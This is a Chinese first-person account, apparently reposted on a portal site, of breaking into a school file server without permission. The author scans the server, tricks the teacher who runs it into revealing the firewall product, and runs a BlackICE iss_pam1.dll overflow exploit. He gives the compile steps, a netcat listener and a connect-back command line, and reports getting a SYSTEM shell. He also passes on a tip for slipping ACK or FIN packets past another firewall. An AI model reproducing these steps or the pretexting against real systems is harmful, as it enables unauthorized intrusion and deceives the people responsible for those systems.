分享
 
 
 

一次意外的入侵经历---黑冰防火墙溢出攻击

王朝other·作者佚名  2008-05-21
窄屏简体版  字體: |||超大  

1、事出有因

最近学校新上了一台文件服务器,用于校园网内教师交换教案和资料共享之用。服务器正好放在我实验室隔壁,隔着玻璃就能看到。(可惜啊!可望不可及:-( )通过我多方打探,大体了解了服务器的网络设置,关键就在于服务器有两块网卡,一块居然和我们实验室相连(一开始不了解是为什么,事后才知道为了便于实验室的管理员远程管理!)一块与学校主干网相连。知道了这些手就痒痒了,更何况负责服务器安全配置的老师说他把机器配置得很无敌了!(汗!~这么具有挑战性啊~)

2、初试身手

由于我本身就在实验室,所以当然用服务器实验室的那段ip最方便了,因此以下我说的ip都是指服务器和实验室同网段的ip。很容易获得了文件服务器的ip 为192.168.203.2,我的机器的ip为192.168.203.16。很自然地ping了一下,结果如下:

K:mfm>ping 192.168.203.2

Pinging 192.168.203.2 with 32 bytes of data:

Reply from 192.168.203.2: bytes=32 time<10ms TTL=128

Reply from 192.168.203.2: bytes=32 time<10ms TTL=128

Reply from 192.168.203.2: bytes=32 time<10ms TTL=128

Reply from 192.168.203.2: bytes=32 time<10ms TTL=128

居然可以ping得通!(难道没装防火墙?也许那个老师自信把所有漏洞都补上了,难道不怕我DDOS它?:-))。还是谨慎点好,我用了一贯测试防火墙的方法做进一步的检测

在cmd下输入telnet 192.168.203.2 54321 大约经过了10几秒左右,出现下面的提示:

K:mfm>telnet 192.168.203.2 54321

正在连接到192.168.203.2...无法打开到主机的连接 在端口 54321 : 连接失败

我晕,根据经验肯定是有防火墙的!其实这个判断原理是很简单,你用telnet到目标主机的任意不存在端口,如果停留时间比较长后才出现连接不上的提示,那么几乎可以肯定对方装有防火墙了(或是其它包过滤设备)。但是有点奇怪,既然是防火墙为什么要允许ping呢?。不管它了,既然有了防火墙,那么先猜一下它可能开的端口吧。既然是文件服务器,估计ftp得开吧。连一下试试,如下:

ftp: connect :连接超时

我倒。。。ftp端口也被屏蔽!不是文件服务器嘛。。不用ftp难道用……共享?!!不至于吧,这也太……现在只有两种可能,要么ftp端口被改了,这样我得进行大范围的端口扫描(关键会留下好多的扫描记录撒!~~)另一种可能就是服务器没有使用ftp来上传管理文件而是采用的共享,我选择了第二种,因为第一种不太现实。既然是用共享的话,那么139端口应该是开放的吧?

好我试一下,这里要用到一个工具hping,这个工具可以自己定制数据包,使用方法如下:

方法如下:

K:mfm>hping

Compiled by Anarchy@hk20.com

Usage: hping [options] host

-h

Show this help menu

显示帮助菜单

-v

Show version number

显示软件版本号

-c

Stop after count response packets.

收到多少个响应包后停止发包

-i

Interval in X (seconds) or uX (micro seconds) 发包间隔时间以秒或毫秒

-M

Set sequence number

设置包序列号

-a

Spoof source address

伪造源IP地址

-p

Destination port

-p 目的端口

-s

Source port

源端口

-R

Set RST tcp flag

设置RST位

-S

Set SYN tcp flag

设置SYN位

-A

Set ACK tcp flag

设置ACK位

-F

Set FIN tcp flag

设置FIN位

-P

Set PSH tcp flag

设置PSH位

-U

Set URG tcp flag

设置URG位

后面的中文是我加的说明,相信大家一看就知道怎么用了。说了用法,我们来看看如何操作了,在cmd下输入:hping -S -p 139 -c 3 192.168.203.2

意思向192.168.203.2的139端口发送SYN数据包(就是请求连接的包)响应3次就停止发包,结果如图一。

哈哈!有回应了,说明我的猜测没有错!果然是用了共享。下面该怎么办呢?暴力破解?我可没那闲工夫!怪不得那个老师如此得意啊,原来只开了个139,其它的要么关闭了,要么被防火墙给屏蔽了!这么少的入口,当然不可能了!我几乎要放弃了,但是我又很不情愿,已经分析到了这一步。。。无奈之中无意间打了如下命令:nbtstat -A 192.168.203.2

结果却让我大大的吃惊,如图二!

居然可以netbios查询!!我一下子来了兴致,因为我以前研究过很多防火墙,大部分防火墙把安全等级调到高级后,即使你允许139等netbios端口开放那么也是无法进行netbios查询的!wait!好象只有最近研究一款防火墙的溢出漏洞时发现这款防火墙默认是允许netbios查询的!!那就是——BlackICE SERVER PROTECTION!!其实这真是巧合,我前天刚从天天安全网down的blackice,然后在securiteam.com看到的溢出代码和漏洞分析报告,真没想到这个文件服务器……等等,我还是最好再确认一下吧!可是我该如何进一步确认呢?从网上的漏洞分析报告来看,该漏洞是由于ISS产品中的协议分析模块(iis_pam1.dll)在处理ICQ v5协议中的SRV_META_USER命令字段的时候由于未能检测该字段的长度从而引起缓冲区溢出的。Blackvice没有开什么特定的管理端口,没有非常明显的特征,所以单凭技术是非常难以判断的……那么还是另辟新径吧!

3、无所不用其极

无敌(哭丧着脸):老师,救命啊!!!

老师:啥事啊?

无敌:最近机房里老是有人在莫名奇妙的扫描我设的网关啊!我都烦死了!

老师:这还不简单?垒个墙不就行了?

无敌:我……给您说实话吧,我对这方面真是一知半解的,我知道老师您在这方面很有研究,给条明路吧!

老师:我也只是多学了点而已(我汗。。这么经不起。。)你去网上找那个黑冰(就是blackice)服务器版的装上就可以了!

无敌:啊?没听说过啊!好用吗?

老师:当然好用了,我那服务器上就装的啊!(嘎嘎!~~~我差点跳起来)

无敌:谢谢,老师您真是高手!我马上去下去!再见!

社会工程学,任何时候任何地方,与技术相结合会有意想不到的结果。既然确认了目标系统的防火墙为blackice那么我们再看一下该漏洞涉及的blackice的版本吧,如下:

ISS RealSecure Network Sensor 7.0 XPU 22.9

ISS RealSecure Network Sensor 7.0 XPU 22.11

ISS RealSecure Network Sensor 7.0 XPU 22.10

ISS RealSecure Network Sensor 7.0 XPU 20.15

ISS RealSecure Server Sensor 7.0 XPU 22.9

ISS RealSecure Server Sensor 7.0 XPU 22.11

ISS RealSecure Server Sensor 7.0 XPU 22.10

ISS RealSecure Server Sensor 7.0 XPU 20.19

ISS RealSecure Server Sensor 7.0 XPU 20.18

ISS RealSecure Server Sensor 7.0 XPU 20.16

ISS BlackIce Server Protection 3.6 ccf

ISS BlackIce Server Protection 3.6 ccb

ISS BlackIce Server Protection 3.6 cbz

ISS BlackIce Server Protection 3.5 cdf

ISS BlackICE Agent for Server 3.6 ecf

ISS BlackICE Agent for Server 3.6 ecb

ISS BlackICE Agent for Server 3.6 eca

ISS BlackICE PC Protection 3.6 ccf

ISS BlackICE PC Protection 3.6 ccd

ISS BlackICE PC Protection 3.6 ccb

ISS BlackICE PC Protection 3.6 cbz

ISS BlackICE PC Protection 3.6 cbr

ISS Proventia A Series XPU 22.9

ISS Proventia A Series XPU 22.11

ISS Proventia A Series XPU 22.10

ISS Proventia A Series XPU 20.15

ISS Proventia G Series XPU 22.9

ISS Proventia G Series XPU 22.3

ISS Proventia G Series XPU 22.11

ISS Proventia G Series XPU 22.10

ISS Proventia M Series XPU 1.9

ISS Proventia M Series XPU 1.8

ISS Proventia M Series XPU 1.7

ISS Proventia M Series XPU 1.3

看到了吧,这么多东东都受那个漏洞的影响,不怕他不中!马上找出exploit来,该exploit是linux下编写的,要想在win下我们就要用cygwin来搞定它了!先把exploit复制到cygwin的home目录里文件名为blackhit.c,然后打开cygwin我们编译。如图三。

OK!编译成功了,把cygwin目录下的bin目录里的cgywin1.dll和你编译好的blackhit.exe一起复制到一个目录里。准备工作做完了,我们看看手中的武器的使用方法,如下:

K:mfm>blackhit

557iss_pam_exp - RealSecure / Blackice iss_pam1.dll remote overflow exploit

- Sam

compiled by 无敌最寂寞@ringz.org

blackhit <hostname> <listenhost> <listen port>

listenhost, port: connect back host and port

参数不多,blackhit 目标主机的ip 本地监听的ip

本地监听的端口。

OK!激动人心的时刻到了,再打开一个cmd,输入nc -v -l -p 518。然后另一个cmd输入blackhit 192.168.203.2 192.168.203.16 518。运行结果如图四。

嘎嘎!!得到shell了,看看是什么权限哦!如图五!

果然是system权限!真是说不出的心情,就这么意外的得到了权限,成功的入侵目标主机!

事情到此也就结束了,跟那个老师坦白后,我们两个都很尴尬,最后还是一起去喝了一顿酒!(不打不相识啊!^_^)

事后我又在实验室重新做了一次溢出测试,结果发现当溢出成功后,目标系统没有任何反应,但是防火墙就跟僵死在那,你也可以照常打开,设置防火墙。但是防火墙不会再记录任何入侵日志了!而且你只能重新启动机器才能恢复防火墙,我尝试停止防火墙的服务然后再启动服务,结果在启动的时候提示说“服务的实例已在运行中”说明在溢出的时候造成了服务进程blackd.exe假死的现象。所以只有重新启动才能恢复正常。

此次经历让我对防火墙产生了浓厚的兴趣,又接二连三的测试了不少防火墙的安全性,其中在测试天网防火墙的时候发现,尽管防火墙处于最高安全级别,但是利用hping一样可以绕过防火墙ping通后面的主机,具体方法就是将发送的数据包的ACK位或者FIN为置位,这样防火墙就放行了!由于此类问题不在本文的讨论范围内了,有兴趣的读者可以自行实验试一下!

4、后记

写完这篇稿子我总算可以松一口气了,关于这个漏洞我再补充几句,其实类似这样的漏洞有很多比如想wsftp等的溢出漏洞,此类漏洞是可遇不可求的,你如果非要用这个漏洞去找寻什么肉鸡的话,那么我劝你还是别大海捞针了!

同时要说明的是ISS后续推出的ccg和cch版本的blackcie已经补上了此漏洞,请使用该防火墙的朋友赶紧升级吧

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有